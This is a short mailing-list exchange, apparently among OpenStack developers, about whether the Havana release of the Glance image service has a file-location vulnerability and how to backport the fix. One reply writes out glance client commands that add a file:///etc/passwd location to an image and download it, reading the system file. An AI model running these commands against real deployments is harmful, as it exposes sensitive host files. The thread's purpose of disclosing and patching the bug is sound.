Seems I was wrong.

Thanks, I'll look at it again.

On 01/08/2015 07:37 PM, Jesse Keating wrote:
On 1/7/15 8:47 PM, George Shuklin wrote:
I spend few hours trying to backport to Havana, but than I found,  that
Havana seems be immune to the bug.  I'm not 100% sure, so someone else
advised to look too.

The bug was that icehouse+ accepts all supported schemas. Fix excludes
'bad' schemes. Although Havana have explicitly given list of accepted
schemes for location field, and 'bad' schemes are not in it.

Havana is certainly not immune. I was able to fetch content from the system fairly easily.

Start with an updated glance client

Modify it as listed in

$ glance image-create --disk-format raw --container-format bare

$ glance image-update --size 700 <image_id>

$ glance --os-image-api-version 2 location-add --url file:///etc/passwd

$ glance image-download <image_id>

That got me (some of) the contents of /etc/passwd.

The patch I posted prevented this from happening. It blocks adding a location that is file:// based, but still allows other location adds that should be allowed.

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